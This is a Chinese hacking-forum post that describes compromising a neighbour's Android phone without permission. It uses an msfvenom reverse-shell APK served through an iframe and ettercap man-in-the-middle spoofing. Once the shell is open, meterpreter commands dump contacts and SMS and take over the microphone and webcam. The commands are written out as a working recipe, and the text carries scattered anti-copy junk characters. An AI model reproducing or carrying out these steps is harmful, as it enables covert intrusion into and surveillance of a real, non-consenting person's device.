找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1817|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

Q% M& n' T+ W, J5 i 五、msf+ettercap入侵邻居安卓手机 ( W6 {1 [+ R9 N0 ?5 C; J& X

( W) h8 K: ^) a

- N2 V4 q" c6 f0 H; g* Y 首先启动msf 1 N; w# x% V& v7 k

2 m8 U* w) D$ L7 x

. d; n4 X' V5 h9 c: V 先用kali生成一个安卓木马,如下命令: 4 k t) k4 A4 q( o

2 q+ h+ n A) D% l4 W

, i# o3 M, x3 A; ^- R4 m% o; q: \ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) w$ O& m: b: M5 X. M

$ |2 v! J6 s' o2 I' r

2 G+ n( ~; u) t" Q 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 8 r- L- H1 w7 A& [ N v

! Y4 t8 w. h$ u/ Q$ z- t* @

! h4 X+ t. l3 n" A5 \1 j: r9 _ 然后进入msf ! o! K; V6 b# ^ k$ i/ T- J

- A( w9 l" ^# ]* ^9 L, P0 \, n

' g! y! e& s. d" V& S6 F use exploit/multi/handler 9 D: R! q, f2 c5 H' L5 c

3 y* \) m2 ~3 c: a3 _$ M

: I" F: h4 N# X0 `) |/ z; Y set payload android/meterpreter/reverse_tcp + F* j0 q6 b: [9 a

$ ]2 |$ U! ?4 I+ K; i( k

& B5 R: J& J/ ]! \ set LHOST 192.168.0.109 //ipkailiip ( e6 X- n9 o" f' `: p3 q

; ^: t( Q8 @# [ X2 J

$ v. u/ \. T- u2 ]) p+ R N set LPORT 44444 //端口一定要与前面生成的木马的端口一致 7 {. F* j/ P+ Z5 |9 w

& H2 l, z& o7 ~2 D

, p8 Z% e8 ?7 _ Exploit + k1 z1 m' [ ]

) t+ m' Z- J/ f; m* O

& v" {: o5 ~" H+ C' r   & L; \& f6 M9 K% p' e

' J3 L! n4 [- P% W) P& f e8 H8 z5 F

8 H9 y! D N e. W 下面我们开启ettercap -G , [- H8 g# R% G" T

7 J* b/ Q; ~3 w0 {# |2 x

; p1 x" K1 h8 m1 }, t" O9 J7 V 我物理IP Y$ k: ^" w. @- U- i5 p

- Z9 {% T1 a. k5 ~( O% E

) ?& W/ u3 T8 d/ G   & u& j* b5 @" Z2 B! E) T9 c }

0 [1 P5 }/ U- X M! W

/ Y, |) h! p. u9 ` 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) ^( g3 I* W1 v! H7 n7 b

8 M6 n! q" }! V' R

8 j u. k9 H5 Q 下面我们来设置一下 ) Q9 n9 U/ d5 M" V

+ q; p0 d0 L# s

7 h( U# f: A$ O1 z ]% |4 J6 J: n   ; b1 h0 Q6 ~* g( F& H

) {. |. D- ^/ Q, D

2 W8 f% h4 q* e9 v, ~) _8 x 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, % J$ R) o1 J# C, u0 u# p

& H, i( D6 P ^' j0 X9 `

8 @1 |- {& h, Z, f4 D   " Z! I% ?. {( o# i0 E* B- h

8 c* K- @& y/ U" K- |% l1 k

* j; W$ b0 z- }. ^. g1 h! E$ J   6 _1 K( ~6 n) @& ?

& s$ t- k6 k# G# B5 g. F! E

% L" g# j! T6 h, H$ v% z) ~. H) \   W" i: v0 t& ]7 A) \

9 g' R p- d- d }* l1 `

7 w# _! e, B0 F" ~" Y. k   6 F. {+ d9 J2 g+ M

+ W) n3 d4 ?& m" _0 C [( O( m1 |

) H3 ~7 E+ N( C9 Y2 r/ d0 x   % t, b* a. q0 P

" @* V- ?7 i5 x/ a' ? I" a. g

. P) ~8 M8 ?% i! Z5 h   + {; G, P) \& D1 O. _! y9 v1 Y

; D4 K3 ]) x. `3 V k

6 a: a v. B# {, S# n   4 Z# B" X* ~( j( S, p& N

9 Q$ Q) A0 f& r; l

1 r" e5 n6 C+ n& d   ( U% k9 I, P- r2 g) y6 B$ \" s- x0 ]

/ c5 r- f+ A( y

" g* U, o7 C0 i, M" q# h   0 S8 M9 E3 M% l

. x9 r6 H! c" f* ~ e, F

+ u/ w; w/ i0 `8 ]8 w   6 W5 R/ W) L# V8 n8 \% u2 \, ^

: [7 p: k+ o8 i, O

: b' H7 Z9 e7 I' q0 |' ~   ' I# l7 Z) B$ ^0 }& b

& v6 O) w8 `! j

) |) C2 Q1 m _, ]5 P) W8 u   $ N' B: k; Y( x, S8 N

( V% y4 W+ g. H0 P( g

) X. z; S- [0 E! W# T O   & ]+ `) _' C+ c; [0 L

# ?& D& e8 B% P# c) U

- y3 p6 \" l7 I) C 下面我们开始攻击 1 b8 R, _2 f+ [8 n4 k

8 J; r" x* W8 T) N: X

0 D: _9 y D( k0 p3 b7 i" _   . \" u+ O. u' n& G

: x1 i' B9 }$ K3 ^* u' E

" V' ?4 k1 Y( l; E3 k   - F. Q1 ^4 m; C+ N9 L6 W% t

. X' V! d4 O: Z. D

, {( v! \' d& y* P9 t% v   % o+ o. s) I6 M& Z& a X, Z' v

( @$ C4 \! S5 [3 t

: H" _3 Y/ D7 r' X6 y! p& |( z   ; I$ Z8 t6 @! _# X) o5 O

0 A( I( F; ^3 c1 j/ _3 v) S; k4 Y

1 G) i; U5 H) P8 Q! J   , k( m! E0 x( k

5 z0 W! @! B$ U# h; {4 L

$ e8 s7 S( W! L' P! C+ y 大概过了5分钟多,发现反弹成功了 , v* M2 f4 u. q7 \

$ J- Z" A1 \2 d$ G0 w. _$ k

1 S0 j" j) x% ?/ _4 ~1 z   5 I" b6 t& b" Y0 h6 L

. h, s2 y! `$ K8 s& Z a* \

+ m; ]3 {0 `2 {! l- E   7 k9 q9 d" m0 |+ f" I v9 g

) B n- s, n) f3 u8 h; X, P% X

; y/ P3 l& ?7 w" Z b   / M8 q5 P, a5 m6 G

3 z8 W; [: ?% |- U) N2 O

% q* x f# f2 D5 G5 \   / C! Y1 C' K; Q) k

6 x5 A4 ~) v" |5 q( g' e- Y

1 p2 K1 ]( M. P& d7 W! @' p4 f   / }) B: E/ K2 y* J0 i1 e2 B

/ _9 ]5 W; {7 i R) P- o

: x' _. x) y( p' | V& Y) z; N: H+ A   - k! b, r" C- D/ B# G2 x# C" y

) k, B- u q: k j' X

( G2 I/ M0 I1 @) i$ o1 a   + ]% O7 F) Y3 X( h; T, s

, t9 v& {! G" T) I6 r

: y+ f' k5 @) x ?& g( h 执行命令 - U# ^" B Q; {5 E# O

) G! F% o' F0 `1 m. }8 _

" Z- Q& d( } l; O   1 ^- A& \- x) Q; y# l4 R& I9 w

. N" O" \& e' w2 O0 ?/ x% s

* F9 Q" n" T, N& S8 o* o1 G! w* t5 x dump_contacts    --》这个是导出电话 - Z, k* G* ?1 c+ Y

6 g1 v- s/ @1 m4 t2 i

0 w- z# D6 u6 n0 A- ]3 `, i dump_sms --》这个是导出信息 . C+ ]) r% [8 }$ T m

+ N. N' ~& a( a$ \" Q# P

5 v: W. c! J* N) j" K* U record_mic     Record audio from the default microphone for X seconds + L& M0 z, \5 M8 k3 `

2 T A7 x1 t/ b4 M9 `- u. ~

" |* |/ L) x! j/ Y+ H% A     webcam_chat    Start a video chat $ e$ N! o+ B- a7 k

9 @, D- {4 G; @* p1 I4 I6 n

# P% u, {8 {/ m! U9 V3 s# j     webcam_list    List webcams . s! N: j) ^ o: X( T1 W9 ~

3 e5 B0 f- F6 H1 ~1 f/ L

}7 G) {) p* t, b% h+ @# t; {     webcam_snap    Take a snapshot from the specified webcam 8 h; i$ V( y* n, y% Z5 ]0 ~6 u

3 q# Z+ M, O$ n. c, ?( z

1 A9 j+ ?& I5 H5 q4 r9 j+ I webcam_stream  lay a video stream from the specified webcam + q% u, j8 n7 E- l! e3 j- i

' F$ y& L ~5 J- w1 b

z- L2 y+ w2 g5 Z' h   - T" B* p! T( }+ v" T

. y: o: }/ l z. m$ [

. i7 Q1 @; I3 b; E   9 Q0 `2 v" [) C; Z

0 y" G! Q% P! J! M4 V. L4 x

2 L% F# W% o/ e5 M$ V 我们打开看一下电话薄, % G0 U6 E5 H3 n5 p, s1 y

8 E6 \+ \; U4 T( F1 h R; t

1 D0 ]8 Q) W, J' C6 W! x7 b! m h   0 r e- x4 R. t& o0 T7 L; X5 O( \6 T

$ c& n+ M& Y3 Q

# p- A5 R; {& \# S! X3 O' n9 b   2 s% O5 X3 t1 Y! H7 [. W# `) Q

8 v7 c: ?9 x) I

( G0 O' j4 ?) b8 l% r3 K r$ G   ( T# n) H9 q; B! N: Z$ e' s

/ d0 Z2 r' |& M" C3 Y

3 o# K+ ]$ M, u) f3 {/ r   8 ~) \' o1 y7 ]. e9 `( q3 S T1 S

- w' S4 F: X, l+ ?- ]

( r( T# u& N, j   ! i& j2 |, c. e4 N& T! f1 k& P4 H5 D

5 r0 m/ |4 j+ L& a, I

9 U* N( c* u2 N   . k- s u7 z( w. Q( ?

/ k- k( @( v% `2 f3 Z, ~

1 a5 X" G7 f1 ? 我们同时欺骗成DroidJack木马,使用方法如图: # _. [4 s! h* R) I2 b

9 G4 ]7 k* I% T F5 ^: I

" o8 o9 R- _: Q   . Z9 Z9 F6 }4 U* Q6 l7 }

& T' w+ X V3 @- n

2 V4 |1 m, d( b2 {5 W   ! q# B# e6 X9 W# v

" Q; r( A! G# Q# }: t

9 T- h* x$ V" @# j% J' B( c- L4 p   . ^5 ~- d7 j# ?

& l# ^9 |2 m& F$ G) ]

+ j2 }* W. f0 A6 x1 Z 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 5 l& \: V. N# A. ?+ C* g' C5 f

6 l9 W, [" H5 l+ B$ F

# |+ A% H! i+ ?# b7 G& u+ x   m3 w' l, F' z2 H4 x N

5 C5 C. r3 E2 t; U

' I5 f6 D% Q7 I" Q) m0 ~   z3 Q" m0 d. Y" @, }, t d

. o1 _2 j6 N* J

" \* s) o& B. o7 Q* r   9 @2 T2 w9 u5 }! V) k$ ~

/ i# ~. ]% A! u5 d9 O0 o8 y$ s9 \

; w/ T/ H; ^! i& G5 B+ T% O' ^ 1 O& L: o* m5 k: O% p U' p

% R& ?& @$ p+ L- X8 K

3 f4 o. b( N% ]
9 k7 a* ^; h3 H$ e

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表